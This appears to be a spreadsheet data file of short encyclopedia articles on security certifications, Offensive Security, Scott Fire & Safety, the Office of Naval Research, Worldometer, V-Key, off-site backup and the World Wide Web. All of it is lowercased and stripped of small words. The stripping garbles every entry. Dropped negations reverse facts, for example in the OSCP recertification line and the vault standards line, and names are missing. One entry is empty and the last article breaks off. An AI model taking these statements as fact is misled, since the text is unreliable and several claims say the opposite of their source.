    <t>certified social engineering prevention specialist (cseps) refers individual mitnick security consulting certification broader professional certification program. cseps program currently offers type certification. attain certification, candidate must attend cseps training course pass exam proctored completion. training program focuses primarily social engineering works numerous case histories detailed breakdown psychological principles related influence. specifically focuses malicious hacker information thief uses social engineering and/or pretexting obtain illicit access computer systems duping employees, done minimize social engineering based attacks organization. course exam costs approximately us$2300.00 person. course days length. exams takes hours complete consists 50-90 multiple choice questions essay section dealing specific actions taken prevent social engineering proposed scenario. exam first designed kevin mitnick alexis kasperavičius 2004, assistance various experts psychology field. external links cseps course outline mitnicksecurity.com</t>
  </si>
  <si>
    <t>User:Dcdan4</t>
  </si>
  <si>
    <t>wikipedia user dcdan4, otherwise known church, retired engineer residing snohomish, washington. recently entering sixties, trying keep world, wikipedia places rich lifelong learning opportunities. contributing articles creating relevant content potential leaning something every day. dcdan4 intending invest time learning (for him) things. times dcdan4 scratching head make wikipedia pages look proper, engages bicycle riding, hiking, running knocking items honey-do list. married three kids, still picture. origin church originally state michigan, u.s. relocated washington (state) 1984. employed boeing company years engineering various aerospace products. references also online identity online identity management</t>
  </si>
  <si>
    <t>3M Scott Fire &amp; Safety</t>
  </si>
  <si>
    <t>scott fire safety american manufacturer respiratory personal protective equipment including supplied purifying respirators, compressors, detection systems thermal imaging cameras. company founded 1932 uniloy accessories corporation, located monroe, north carolina. 2001 acquired tyco international 2017 acquired history: uniloy scott aviation 1932 company founded lancaster, york earl scott uniloy accessories corporation, aeronautics parts producer. later changed name scott aviation, year began creating portable on-board oxygen system pilots. 1945 began producing air-pak scba, scba began field firefighting. scott aviation acquired figgie international 1967, 1976 scott aviation partnered nasa produce first high-pressure scba. company renamed scott technologies 1997, 1999 separated companies: scott aviation scott health safety. company headquartered monroe, north carolina, company facilities locations, including australia, china, dhabi. scott safety produces fire safety apparatuses, including ppe, purifying respirators, compressors, detection systems. these used military personnel, industrial workers, first responders, including firefighters. prior 2001, company traded nasdaq ticker symbol sctt. 2001 company acquired tyco international, 2011 changed name scott health safety scott safety. 2014 scott safety acquired flame protection company industrial safety technologies $329.5 million. 2017, entered negotiations acquire scott safety billion. april 2018, announced rebranding scott safety scott fire safety. apparatuses company still produces flagship product, scott air-pak scba. scott safety creates several kinds compressor systems including hushair 7500 connect includes hushair connect revolveair connect filling scba cylinders, smarttouch controller, integrates breathing compressor, storage bottles, charge station. systems 7500 design. also produces duraflow breathing apparatus, used medical personnel avoid breathing airborne disease avian flu. addition scott safety detection systems, published detection system reference guide covers various gases health effects.in 2016 scott safety began producing firefighting masks thermal imaging named scott sight, supplements hand held thermal imaging technology. inside helmet screen allows firefighters view thermal imaging results time viewing outside mask. image appears peripheral view, nine frames second period four hours. camera display mounted helmet weighs ounces. references</t>
  </si>
  <si>
    <t>Offensive Security Certified Professional</t>
  </si>
  <si>
    <t>offensive security certified professional (oscp) ethical hacking certification offered offensive security teaches penetration testing methodologies tools included kali linux distribution (successor backtrack). oscp hands-on penetration testing certification, requiring holders successfully attack penetrate various live machines safe environment. considered technical ethical hacking certifications, certifications requires evidence practical penetration testing skills. recertification oscp require recertification. relations security trainings exams successful completion oscp exam qualifies student (isc)² credits. 2015, uk's predominant accreditation body penetration testing, crest, began recognising oscp equivalent intermediate level qualification crest registered tester (crt). reception "kali linux: toolbox pentest," porup called oscp certification "coveted" required passing difficult 24-hour exam demonstrating hacking. press release chief operating officer security services company, company's oscp professionals described strength. "the ultimate guide getting started with cybersecurity" vishal chawla analytics india recommended oscp "well known" security certifications. interview offensive security ning wang, adam bannister daily swig discussed "major update" "penetration testing kali linux (pwk)" training course, leads oscp certification students pass final exam. training updates discussed detail helpnet security.in basics hacking: tools techniques attack web, josh pauli called oscp "highly respected." cybersecurity education awareness compliance gave syllabus outline training course oscp. phishing dark waters: offensive defensive sides malicious emails, co-author christopher hadnagy listed oscp qualifications. certified ethical hacker (ceh) foundation guide listed oscp certifications offensive security "security testing track." sicherheit webanwendungen praxis also included oscp list recommended certifications. building pentesting wireless networks called offensive security training "practical hands-on" said "most recommended."in "the information security undergraduate curriculum: evolution small program" lionel university richmond said information security jobs require certifications, described oscp "popular certification." "maintaining cybersecurity curriculum: professional certifications valuable guidance" called oscp "advanced certification" select few" requiring hands-on penetration skills demonstrations. references external links official website</t>
  </si>
  <si>
    <t>Offensive Security</t>
  </si>
  <si>
    <t>offensive security american international company working information security, penetration testing digital forensics. operating around 2007, company created open source projects, advanced security courses, exploitdb (vulnerability database) kali linux distribution. company started mati aharoni, employs security professionals experience security penetration testing system security evaluation. company provided security counseling training many technology companies.the company also provides training courses certifications. background history mati aharoni, offensive security's co-founder, started business around 2006 wife iris. offensive security formed 2008. company structured offensive security services, 2012 north carolina. september 2019 company received first venture capital investment, spectrum equity, ning wang replaced steinbach, previous four years, business philippines. o’gorman, company's chief strategy officer, also gives training writes books. customers include cisco, wells fargo, booz allen hamilton, defense-related u.s. government agencies. company gives training sessions annual black hacker conference.in 2019, j.m. porup online wrote "few infosec certifications developed prestige recent years offensive security certified professional (oscp)," said reputation difficult," requires student hack test network difficult "24-hour exam." also summarized accusations cheating, offensive security's responses, concluding hiring based credentials mistake, applicants skills validated. 2020, cybersecurity professional matt start cyber career, writing detailed review comparison oscp comptia pentest+, said oscp "well known pentesting community, therefore well known managers hire them." projects addition training security services, company also founded open source projects, online exploit databases security information teaching aids. kali linux company known developing kali linux, debian linux based distribution modeled backtrack. succeeds backtrack linux, designed security information needs, penetration testing digital forensics. kali nethunter offensive security's project architecture android devices. kali linux contains security programs. release second version (2.0) received wide coverage digital media offensive security provides book, kali linux revealed, makes first edition available free download. users employees inspired careers social engineering. 2019, detailed review, cyberpunk called offensive security's kali linux, "formally [sic] known backtrack," "best penetration testing distribution." backtrack backtrack linux open source general public license linux distribution developed programmers around world assistance, coordination, funding offensive security. distribution originally developed names whoppix, iwhax, auditor. designed delete trace usage. distribution widely known used security experts. exploitdb exploit database archive vulnerable software exploits made public information security community. database designated help penetration testers test small projects easily sharing information other. database also contains proof-of-concepts (poc), helping information security professionals learn exploits variations. ethical hacking penetration testing guide, rafay baloch said exploit-db 20,000 exploits, available backtrack linux default. certified ethical hacker study guide, messier called exploit-db "great resource," stated available within kali linux default, could added linux distributions. metasploit metasploit unleashed charity project created offensive security sake hackers charity, started johnny long. projects teaches metasploit designed especially people consider starting career penetration testing. google hacking database google hacking database created johnny long hosted offensive security. project created part hackers charity. database helps security professionals determine whether given application website compromised. database uses google search establish whether usernames passwords compromised. also offensive security certified professional kali linux kali nethunter backtrack linux list computer security certifications references external links offensive security official website kali linux official website offensive-security github</t>
  </si>
  <si>
    <t>Automated threat</t>
  </si>
  <si>
    <t>automated threat type computer security threat computer network application, characterised malicious automated tools internet bots. automated threats popular internet complete large amounts repetitive tasks almost cost execute. threat ontology owasp automated threat handbook provides threat ontology list classifying automated threats, enumerated below. references</t>
  </si>
  <si>
    <t>WildLeaks</t>
  </si>
  <si>
    <t>Office of Naval Research</t>
  </si>
  <si>
    <t>office naval research (onr) organization within united states department navy responsible science technology programs u.s. navy marine corps. established congress 1946, mission plan, foster, encourage scientific research maintain future naval power preserve national security. carries funding collaboration schools, universities, government laboratories, nonprofit organizations, for-profit organizations, overseeing naval research laboratory, corporate research laboratory navy marine corps. conducts broad program scientific research, technology advanced development. headquarters ballston neighborhood arlington, virginia. global offices overseas santiago, paulo, london, prague, singapore, tokyo. overview authorized congress, public 588, subsequently approved president harry truman august 1946. stated mission "planning, fostering, encouraging scientific research recognition paramount importance related maintenance future naval power preservation national security."today, carries funding grants contracts scientists engineers perform basic research, technology development, advanced technology demonstrations onr's science technology portfolio allocated follows: "10% quick reaction other s&amp;t, acquisition enablers, leap ahead innovations, discovery invention (basic applied science), other." organization reports u.s. secretary navy assistant secretary navy research, development acquisition. chief naval research rear admiral lorin selby vice chief naval research brigadier general benjamin watson, united states marine corps, also serves director united states marine corps futures directorate commanding general united states marine corps warfighting laboratory. executes mission science technology departments, corporate programs, naval research laboratory (nrl), global office. science technology departments science technology departments support broad range subjects, span efforts combating terrorism, oceanography, warfare, life sciences. these fund basic research programs, primarily u.s. universities; technology research programs, primarily government nongovernment laboratories; advanced technology demonstration programs, primarily u.s. industry companies. additionally, office transition supports technology transitions navy marine corps; small business innovative research office encourages small businesses develop commercialize products support onr’s mission; future naval capabilities program works provide technologies close warfighting gaps; corporate programs office supports cross-disciplinary research education programs. february, 2020, oversees navalx, navy agility cell founded james “hondo” geurts 2018. corporate programs: research education supports many corporate research education programs, including: naval research enterprise intern program (nreip) multidisciplinary research program (muri) defense university research instrumentation program (durip) experimental program stimulate competitive research (depscor) young investigator program national defense science engineering graduate (ndseg) fellowship program summer faculty research program faculty sabbatical leave program naval high school science awards program hbcu (historically black colleges/universities) future engineering faculty fellowship program hbcu/minority institutions program science engineering apprentice program (seap) (run onr, funded american society engineering education) science, mathematics, research transformation (smart) defense scholarship program naval research laboratory naval research laboratory (nrl) founded 1923 today employs 2,500 scientists engineers. corporate research laboratory navy marine corps conducts broad program scientific research, technology advanced development. prestigious history, including development first u.s. radar system, synthetic lubricants (for modern turbine engines), over-the-horizon radar, first u.s. surveillance satellite, clementine space mission. laboratory's current specialties include plasma physics, space physics, materials science, tactical electronic warfare. global global regional offices located blenheim crescent, london, u.k. (europe) santiago, chile (latin america) tokyo, japan (asia/pacific) australia (asia/pacific) singapore (south asia/singapore) prague, czech republic (europe)onr global supporter global security challenge london business school. research onr's investments enabled many firsts, including launch first u.s. intel satellite; development sealab i/ii; validation concept launch first satellite; first global atmospheric prediction model; gwot support various quick response programs; and, recently, electromagnetic railgun, infantry immersive trainer, super-conducting motors. others include: also sponsored symposia symposium principles self-organization allerton park 1960. projects programs alleged philadelphia experiment: said conducted 1943, three years prior establishment onr. also related organizations agencies references external links office naval research homepage naval research laboratory homepage</t>
  </si>
  <si>
    <t>Worldometer</t>
  </si>
  <si>
    <t>worldometer, formerly worldometers, reference website provides counters real-time statistics diverse topics. owned operated data company dadax generates revenue online advertising. available languages covers subjects government, world population, economics, society, media, environment, food water, energy, health.in 2020, website attained greater popularity hosting statistics relating covid-19 pandemic. history website founded andrey alimetov, russian immigrant united states, 2004. 2011, voted best free reference websites american library association.this site changed name "worldometers" "worldometer" january 2020 announced would migrate singular domain name. covid-19 pandemic early 2020, website gained popularity covid-19 pandemic. came cyber attack march 2020. site ddos attack, hacked days later, resulting incorrect information shown covid-19 statistics page approximately minutes. hacked site showed dramatic rise covid-19 cases vatican city, caused panic among users social media. spanish government used figures claim carried tests four countries. worldometers' covid-19 figures also cited financial times, york times, washington post, cnn, rede globo. worldometer faced criticism transparency ownership, lack citations data sources, unreliability covid-19 statistics rankings.in april 2020, editors english wikipedia decided worldometer's covid-19 figures often unreliable cited pages related pandemic. reception edouard mathieu, data manager world data, stated "their main focus seems latest number covid-19 cases] wherever comes from, whether it’s reliable not, whether it’s well-sourced not."virginia pitzer, yale university epidemiologist, said site "legitimate", flawed, inconsistent, containing errors.according axios, website visited website world april 2020. plurality (25.8%) visitors came united states, followed india (8.67%), united kingdom (6.6%), canada (5.18%), germany (3.13%), australia (2.49%), poland (2.18%), france (1.73%), turkey (1.66%), brazil (1.65%). references external links official website worldometer covid-19 statistics page</t>
  </si>
  <si>
    <t>Women in Data Science Initiative</t>
  </si>
  <si>
    <t>founded 2015 stanford university, california margot gerritsen karen matthys, women data science initiative (wids) encourages women around world connect another, form local regional networks, promote inclusive diverse community within rapidly expanding field data science.from problems facial recognition technologies recognize darker-skinned faces predictive policing algorithms misidentify threats intensify surveillance communities color, effects lack diversity data science numerous. biased data sets result additional forms discrimination. when early attempt design computer program help hiring decisions relied mainly resumes men, program "taught male candidates preferable women." while amazon immediately recognized tendency never used program evaluate candidates, example shows relying biased data perpetuate inequalities. according gerritsen, cannot algorithms approaches data-driven decision making really play significant role starting play society large really understand ethics.”wids holds annual women data science worldwide conference annually, held 24-hour virtual event 2021, intended inspire, educate, sustain data science worldwide. 2020, 30,000 people participated, different countries. wids reached 100,000 women around world. pune, india chapter wids, example, 5,000 members. sucheta dhere, ambassador wids pune chapter noted computer vision, natural language processing, machine learning "have huge hiring potential india," particularly women. 2019, women convened madrid wids conference, brought together women working artificial intelligence robotics. cambridge wids event held massachusetts institute technology 2020. signature event panel discussion data science fake news called “data weaponized, data scrutinized: information.” women data science initiative also runs workshops topics ranging actionable ethics, automating machine learning, data analysis health, exploring artificial intelligence. references</t>
  </si>
  <si>
    <t>V-Key</t>
  </si>
  <si>
    <t>v-key software-based digital security solutions provider. headquartered singapore, provides back-end front-end solutions financial institutions, mobile payment providers governments implement cloud-based payments, authentication mobile banking, secured mobile applications user access data protection. background founders v-key founded 2011 entrepreneur eddie chau, benjamin joseph gan. eddie chau, also formed digital agency brandtology, acquired isentia 2014, started v-key primarily secure mobile devices applications patented technology.benjamin co-founder chief executive officer v-key. general manager e-cop (acquired wholly owned subsidiary temasek holdings) regional director encentuate (acquired ibm), co-founded v-key. concurrently venture partner venture craft, chairman jumpstart asia mentor finlabs.joseph third co-founder v-key. before joining v-key, centre strategic infocomm technologies (csit) head cryptography lab, oversaw research development cryptographic solutions ministry defence (singapore).companies funded v-key capital financial services, runs alipay mobile wallet app. technology v-key provides security solutions businesses support cloud-based payments, digital identity authentication mobile banking well secured mobile applications core technology—v-os. v-os virtual secure element globally patented. certified industry bodies including info-communications media development authority singapore (imda) national institute standards technology (for fips 140-2 validation) united states. technology provides secure data transmission solution used encrypted communications, mobile soft token replace hardware tokens, well mobile authentication solutions solutions v-key's partners financial institutions, governments mobile payment providers various markets. technology used digibank bank india, indonesia singapore: digibank built v-key's security solution authentication system user authentication. uob: v-key developed security solution uob's mighty v-os. secured mobile wallet debit credit card holders. customers able make transactions tapping phones merchants’ payment terminal entering pin, authenticating system. chinapnr financial payment provider: v-key integrates virtual secure element "chinapnr acquirer" (point-of-sale payment acquisition query platform) protect mobile applications' runtime environment, program logic important data. financial services streamlines payment services e-commerce website aliexpress: v-key provides virtual software solution v-os financial secure transactions aliexpress, provides cryptographic services trusted environments secure payments processed alipay aliexpress, well risk management every transaction. assurity trusted solutions: v-key provides mobile soft token application assurity's onekey mobile authentication solution. multi-layered protection advanced threats target mobile applications, end-users authenticate secure. awards v-key received following awards: sitf awards gold (emerging technology), silver (mobile application), bronze (startup) herring asia winner herring global winner asean bronze award (start-up) innotribe startup challenge 2013 finalist review's mobility most promising mobility solutions providers" national infocomm awards runner most innovative product/solution asian banker technology innovation award best mobile banking project retail banking also application security encryption cryptographic types references</t>
  </si>
  <si>
    <t>Quadream</t>
  </si>
  <si>
    <t>quadream israeli surveillance technology company. founded 2014 group including former group employees, geva nimrod reznik. offices ramat gan.quadream believed developed "zero-click" exploit tools similar used group. customers include government saudi arabia. references</t>
  </si>
  <si>
    <t>Automated information systems security</t>
  </si>
  <si>
    <t>telecommunication, automated information systems security comprises measures controls ensure confidentiality, integrity, availability information processed stored automated information systems. unauthorized disclosure, modification, destruction accidental intentional. automated information systems security includes consideration computer hardware software functions, characteristics features; operational procedures; accountability procedures; access controls central computer facility, remote computer, terminal facilities; management constraints; physical structures devices, computers, transmission lines, power sources; personnel communications controls needed provide acceptable level risk automated information system data information contained system. automated information systems security also includes totality security safeguards needed provide acceptable protection level automated information system data handled automated information system. information security, automated information systems security synonym computer security. also federal standard 1037c references</t>
  </si>
  <si>
    <t>Automated Data Inquiry for Oil Spills</t>
  </si>
  <si>
    <t>automated data inquiry spills (adios2) software weathering model provided noaa incorporates database containing thousand crude oils refined products, provides quick estimates expected characteristics behavior spilled marine environment. predictions makes, presented graphics text, designed help answer questions typically arise spill response cleanup. predictive information spill response user describes program follows: "you details parameters spill, type wave conditions, winds, temperatures, you, software tells fate extended period." predicting change oil's viscosity (resistance flow) time, adios2 offers answer question: still dispersed chemical dispersants? predicting rate increase oil's water content time, adios2 offers answer questions like: 1,000 gallons (3,800 crude spilled, 1,000 gallons (3,800 oil-and-water mixture need cleaned disposed much more? cases 2010, reported tool used help assess going deepwater horizon spill. references external links adios2 page noaa. includes download instructions, faq, more.</t>
  </si>
  <si>
    <t>William M. Brown (businessman)</t>
  </si>
  <si>
    <t>william "bill" brown former chairman l3harris technologies, large defense contracting company. previously, president, chairman harris corporation, company merged technologies create l3harris technologies 2019. education brown earned bachelor's degree 1984, master's 1987, mechanical engineering villanova university. received wharton business school. career prior joining harris corporation 2011, senior vice president leading strategy development united technologies corporation. before this, president utc's fire security business. during years acquired executive managerial experience countries. before worked mckinsey company senior engagement manager, overseeing business relationships. memberships boards brown board directors celanese corporation, board fire department york city foundation, council trustees association united states army board trustees florida institute technology. chairman aerospace industries association executive committee member national security telecommunications advisory committee. member american manufacturing council dissolved president trump. references</t>
  </si>
  <si>
    <t>Wilmagate</t>
  </si>
  <si>
    <t>wilmagate collection open-source tools authentication, authorization accounting open access network. initially developed computer networks mobility group university trento (italy). development part locally funded wilma project pursued twelve project name uni-fy. currently used wireless authentication faculty science university trento uniwireless network italian research groups participating twelve project. features system designed order separate user authentication phase (which usually performed possibly remote isp) internet access provided user's current location local carrier. therefore, multiplicity authentication providers access providers envisioned. wilmagate system provides code purposes variety authentication methods. modular object-oriented structure allows programmers easily plug-in code authentication accounting protocols. article details. steps following steps performed normal user connection. user's mobile terminal (laptop pda) physically connects network, either plugging cable (ethernet firewire) associating wireless access point wi-fi bluetooth. terminal automatically issues dhcp handshake order appropriate configuration network entering. action, mobile terminal's existence recognized gateway component. client starts form authentication process, either opening browser redirected authentication provider admin's choice, pre-installed authentication program. after authentication client possibly full internet access; however, authentication-based restrictions applicable. code access gateway written executable linux windows/cygwin environments. sample captive portal authentication system written php. further reading mauro brunato, renato cigno, danilo severina. managing wireless hotspots: uni-fy approach. medhocnet 2006, lipari (italy), june 14–17, 2006. mauro brunato, danilo severina. wilmagate: open access gateway hotspot management. wmash 2005, cologne (germany), september 2005. roberto battiti, mauro brunato, renato cigno, alessandro villani, roberto flor, gianni lazzari. wilma: open 802.11 hotspots. proceedings pwc2003, venice (italy), september 23–25, 2003. external links uni-fy page twelve project</t>
  </si>
  <si>
    <t>Off-site data protection</t>
  </si>
  <si>
    <t>computing, off-site data protection, vaulting, strategy sending critical data main location (off main site) part disaster recovery plan. data usually transported off-site using removable storage media magnetic tape optical storage. data also sent electronically remote backup service, known electronic vaulting e-vaulting. sending backups off-site ensures systems servers reloaded latest data event disaster, accidental error, system crash. sending backups off-site also ensures copy pertinent data isn’t stored on-site. although organizations manage store off-site backups, many choose backups managed stored third parties specialize commercial protection off-site data. data vaults storage off-site data also known vaulting, backups stored purpose-built vaults. there generally recognized standards type structure constitutes vault. that said, commercial vaults typically three categories: underground vaults often converted defunct cold military communications facilities, even disused mines. free-standing dedicated vaults insulated chambers sharing facilities often implemented within existing record center buildings. hybrid site off-site vaulting hybrid on-site off-site data vaulting, sometimes known hybrid online backup, involve combination local backup fast backup restore, along off-site backup protection local disasters. according liran eshel, ctera networks, ensures recent data available locally event need recovery, archived data needed much less often stored cloud.hybrid online backup works storing data local disk backup captured high speed, either backup software d2d2c (disk disk cloud) appliance encrypts transmits data service provider. recent backups retained locally, speed data recovery operations. there number cloud storage appliances market used backup target, including appliances ctera networks, nasuni, storsimple twinstrata. statutory obligations data protection statutes usually non-prescriptive within commercial arena data protected, increasingly require active protection data. united states federal entities specific requirements defined u.s. national institute standards technology (nist). nist documentation obtained http://csrc.nist.gov/publications/pubssps.html commercial agencies option using documents compliance requirements. history today's regulatory requirements started "rainbow" series. every organization used standards develop "their" version compliance wrapped around compliance "due care" apply "due diligence" base infrastructure using "security" foundation.statutes mandate protection data are: federal information systems management (fisma) federal information system controls audit manual (fiscam) health insurance portability accountability (hipaa) sarbanes–oxley (sox) basel international gramm-leach-bliley (glba) data protection 1998 foreign corrupt practices ("fcpa") legal precedents thomas linnen, a.h. robins company, inc., als, (mass. super. court, 97-2307). linnen robins, 1999 462015, mass. l.rptr. (mass super. court, 1999). electronics fidelity bank zubulake warburg coleman (parent) holdings, inc. morgan stanley inc., 2005 extra lexis (fla. cir. mar. 2005). also backup off-site data protection part comprehensive backup strategy) remote backup service comparison online backup services bare-metal restore references</t>
  </si>
  <si>
    <t>World Wide Web</t>
  </si>
  <si>
    <t>world wide (www), commonly known web, information system enabling documents resources accessed internet.documents downloadable media made available network servers accessed programs browsers. servers resources world wide identified located character strings called uniform resource locators (urls). original still common document type page formatted hypertext markup language (html). this markup language supports plain text, images, embedded video audio contents, scripts (short programs) implement complex user interaction. html language also supports hyperlinks (embedded urls) provide immediate access resources. navigation, surfing, common practice following hyperlinks across multiple websites. applications pages function application software. information transferred across internet using hypertext transfer protocol (http). multiple resources common theme usually common domain name make website. single server provide multiple websites, websites, especially popular ones, provided multiple servers. website content provided myriad companies, organizations, government agencies, individual users; comprises enormous mass educational, entertainment, commercial, government information. world wide become world's dominant software platform. primary tool billions people worldwide interact internet.the originally conceived document management system. invented berners-lee cern 1989 opened public 1991. history english computer scientist berners-lee invented world wide 1989 working cern switzerland. 1990, developed foundations web: http, html, worldwideweb browser, server, first website order manage documentation. browser released outside cern research institutions starting january 1991, general public august 1991. success cern, began spread scientific academic institutions. within next years, websites created.cern made protocol code available royalty free 1993, enabling widespread use. after ncsa released mosaic later year, became popular thousands websites springing less year. mosaic graphical browser could display inline images submit forms, httpd, server could process forms (see cgi). marc andreessen clark founded netscape following year released navigator, introduced java javascript web. quickly became dominant browser. netscape became public company 1995 triggered frenzy started dot-com bubble. microsoft responded developing browser, internet explorer. bundling windows, became dominant browser years.tim berners-lee founded world wide consortium (w3c) created 1996 recommended replacing html stricter xhtml. meantime, developers began exploiting feature called xmlhttprequest make ajax applications launched revolution. mozilla, opera, apple rejected xhtml created whatwg developed html5. 2009, conceded abandoned xhtml 2019, ceded control html specification whatwg.the world wide central development information primary tool billions people interact internet. function terms internet world wide often used without much distinction. however, terms mean thing. internet global system computer networks interconnected telecommunications optical networking. contrast, world wide global collection documents resources, linked hyperlinks uris. resources accessed using http https, application-level internet protocols internet's transport protocols.viewing page world wide normally begins either typing page browser following hyperlink page resource. browser initiates series background communication messages fetch display requested page. 1990s, using browser view pages—and move page another hyperlinks—came known 'browsing,' 'web surfing' (after channel surfing), 'navigating web'. early studies behavior investigated user patterns using browsers. study, example, found five user patterns: exploratory surfing, window surfing, evolved surfing, bounded navigation targeted navigation.the following example demonstrates functioning browser accessing page http://example.org/home.html. browser resolves server name (example.org) internet protocol address using globally distributed domain name system (dns). this lookup returns address 203.0.113.4 2001:db8:2e::7334. browser requests resource sending http request across internet computer address. requests service specific port number well known http service receiving host distinguish http request network protocols servicing. http normally uses port number https normally uses port number 443. content http request simple lines text: computer receiving http request delivers server software listening requests port webserver fulfill request sends http response back browser indicating success: followed content requested page. hypertext markup language (html) basic page might look like this: browser parses html interprets markup (&lt;title&gt;, paragraph, such) surrounds words format text screen. many pages html reference urls resources images, embedded media, scripts affect page behaviour, cascading style sheets affect page layout. browser makes additional http requests server internet media types. receives content server, browser progressively renders page onto screen specified html additional resources. html hypertext markup language (html) standard markup language creating pages applications. with cascading style sheets (css) javascript, forms triad cornerstone technologies world wide web.web browsers receive html documents server local storage render documents multimedia pages. html describes structure page semantically originally included cues appearance document. html elements building blocks html pages. with html constructs, images objects interactive forms embedded rendered page. html provides means create structured documents denoting structural semantics text headings, paragraphs, lists, links, quotes items. html elements delineated tags, written using angle brackets. tags &lt;img &lt;input directly introduce content page. other tags surround provide information document text include tags sub-elements. browsers display html tags, interpret content page. html embed programs written scripting language javascript, affects behavior content pages. inclusion defines look layout content. world wide consortium (w3c), maintainer html standards, encouraged explicit presentational html since 1997. linking most pages contain hyperlinks related pages perhaps downloadable files, source documents, definitions resources. underlying html, hyperlink looks like this: href="http://example.org/home.html"&gt;example.org homepage&lt;/a&gt;. such collection useful, related resources, interconnected hypertext links dubbed information. publication internet created berners-lee first called worldwideweb original camelcase, subsequently discarded) november 1990.the hyperlink structure described webgraph: nodes graph correspond pages urls) directed edges hyperlinks. over time, many resources pointed hyperlinks disappear, relocate, replaced different content. this makes hyperlinks obsolete, phenomenon referred circles link rot, hyperlinks affected often called dead links. ephemeral nature prompted many efforts archive websites. internet archive, active since 1996, best known efforts. prefix many hostnames used world wide begin long-standing practice naming internet hosts according services provide. hostname server often www, server, news nntp usenet news server. these hostnames appear domain name system (dns) subdomain names, www.example.com. required technical policy standard many sites first server nxoc01.cern.ch. according paolo palazzi, worked cern along berners-lee, popular subdomain accidental; world wide project page intended published www.cern.ch info.cern.ch intended cern home page; however records never switched, practice prepending institution's website domain name subsequently copied. many established websites still prefix, employ subdomain names www2, secure special purposes. many servers main domain name (e.g., example.com) subdomain (e.g., www.example.com) refer site; others require form other, different sites. subdomain name useful load balancing incoming traffic creating cname record points cluster servers. since, currently, subdomain used cname, result cannot achieved using bare domain root.when user submits incomplete domain name browser address input field, browsers automatically adding prefix "www" beginning possibly ".com", ".org" ".net" end, depending might missing. example, entering "microsoft" transformed http://www.microsoft.com/ "openoffice" http://www.openoffice.org. this feature started appearing early versions firefox, still working title 'firebird' early 2003, earlier practice browsers lynx. reported microsoft granted patent idea 2008, mobile devices.in english, usually read double-u double-u double-u. some users pronounce dub-dub-dub, particularly zealand. stephen fry, "podgrams" series podcasts, pronounces wuh. english writer douglas adams quipped independent sunday (1999): "the world wide thing know whose shortened form takes three times longer short for". mandarin chinese, world wide commonly translated phono-semantic matching wǎng (万维网), satisfies literally means "myriad-dimensional net", translation reflects design concept proliferation world wide web. berners-lee's web-space states world wide officially spelled three separate words, capitalised, intervening hyphens. nonetheless, often called simply web, also often web; capitalization internet details. prefix declining, especially applications sought brand domain names make easily pronounceable. mobile grew popularity, services like gmail.com, outlook.com, myspace.com, facebook.com twitter.com often mentioned without adding "www." (or, indeed, ".com") domain. scheme specifiers scheme specifiers http:// https:// start refer hypertext transfer protocol http secure, respectively. they specify communication protocol request response. http protocol fundamental operation world wide web, added encryption layer https essential browsers send retrieve confidential data, passwords banking information. browsers usually automatically prepend http:// user-entered uris, omitted. pages page (also written webpage) document suitable world wide browsers. browser displays page monitor mobile device. term page usually refers visible, also refer contents computer file itself, usually text file containing hypertext written html comparable markup language. typical pages provide hypertext browsing pages hyperlinks, often referred links. browsers frequently access multiple resource elements, reading style sheets, scripts, images, presenting page. network, browser retrieve page remote server. server restrict access private network corporate intranet. browser uses hypertext transfer protocol (http) make requests server. static page delivered exactly stored, content server's file system. contrast, dynamic page generated application, usually driven server-side software. dynamic pages used user require completely different information, example, bank websites, email etc. static page static page (sometimes called flat page/stationary page) page delivered user exactly stored, contrast dynamic pages generated application. consequently, static page displays information users, contexts, subject modern capabilities server negotiate content-type language document versions available server configured dynamic pages server-side dynamic page page whose construction controlled application server processing server-side scripts. server-side scripting, parameters determine assembly every page proceeds, including setting client-side processing. client-side dynamic page processes page using javascript running browser. javascript programs interact document document object model, dom, query page state alter client-side techniques dynamically update change way. dynamic page reloaded user computer program change variable content. updating information could come server, changes made page's dom. this truncate browsing history create saved version back dynamic page update using ajax technologies neither create page back truncate browsing history forward displayed page. using ajax technologies user gets dynamic page managed single page browser actual content rendered page vary. ajax engine sits browser requesting parts dom, dom, client, application server. dynamic html, dhtml, umbrella term technologies methods used create pages static pages, though fallen common since popularization ajax, term rarely used. client-side-scripting, server-side scripting, combination make dynamic experience browser. javascript scripting language initially developed 1995 brendan eich, netscape, within pages. standardised version ecmascript. make pages interactive, applications also javascript techniques ajax (asynchronous javascript xml). client-side script delivered page make additional http requests server, either response user actions mouse movements clicks, based elapsed time. server's responses used modify current page rather creating page response, server needs provide limited, incremental information. multiple ajax requests handled time, users interact page data retrieved. pages also regularly poll server check whether information available. website website collection related resources including pages, multimedia content, typically identified common domain name, published least server. notable examples wikipedia.org, google.com, amazon.com. website accessible public internet protocol (ip) network, internet, private local area network (lan), referencing uniform resource locator (url) identifies site. websites many functions used various fashions; website personal website, corporate website company, government website, organization website, etc. websites typically dedicated particular topic purpose, ranging entertainment social networking providing news education. publicly accessible websites collectively constitute world wide web, private websites, company's website employees, typically part intranet. pages, building blocks websites, documents, typically composed plain text interspersed formatting instructions hypertext markup language (html, xhtml). they incorporate elements websites suitable markup anchors. pages accessed transported hypertext transfer protocol (http), optionally employ encryption (http secure, https) provide security privacy user. user's application, often browser, renders page content according html markup instructions onto display terminal. hyperlinking pages conveys reader site structure guides navigation site, often starts home page containing directory site content. some websites require user registration subscription access content. examples subscription websites include many business sites, news websites, academic journal websites, gaming websites, file-sharing websites, message boards, web-based email, social networking websites, websites providing real-time price quotations different types markets, well sites providing various services. users access websites range devices, including desktop laptop computers, tablet computers, smartphones smart tvs. browser browser (commonly referred browser) software user agent accessing information world wide web. connect website's server display pages, user needs browser program. this program user runs download, format, display page user's computer. addition allowing users find, display, move pages, browser usually features like keeping bookmarks, recording history, managing cookies (see below), home pages facilities recording passwords logging sites. popular browsers chrome, firefox, safari, internet explorer, edge. server server server software, hardware dedicated running said software, satisfy world wide client requests. server can, general, contain websites. server processes incoming network requests http several related protocols. primary function server store, process deliver pages clients. communication client server takes place using hypertext transfer protocol (http). pages delivered frequently html documents, include images, style sheets scripts addition text content. user agent, commonly browser crawler, initiates communication making request specific resource using http server responds content resource error message unable resource typically real file server's secondary storage, necessarily case depends webserver implemented. while primary function serve content, full implementation http also includes ways receiving content clients. this feature used submitting forms, including uploading files. many generic servers also support server-side scripting using active server pages (asp), (hypertext preprocessor), scripting languages. this means behavior webserver scripted separate files, actual server software remains unchanged. usually, function used generate html documents dynamically ("on-the-fly") opposed returning static documents. former primarily used retrieving modifying information databases. latter typically much faster easily cached cannot deliver dynamic content. servers also frequently found embedded devices printers, routers, webcams serving local network. server used part system monitoring administering device question. this usually means additional software installed client computer since browser required (which included operating systems). cookie http 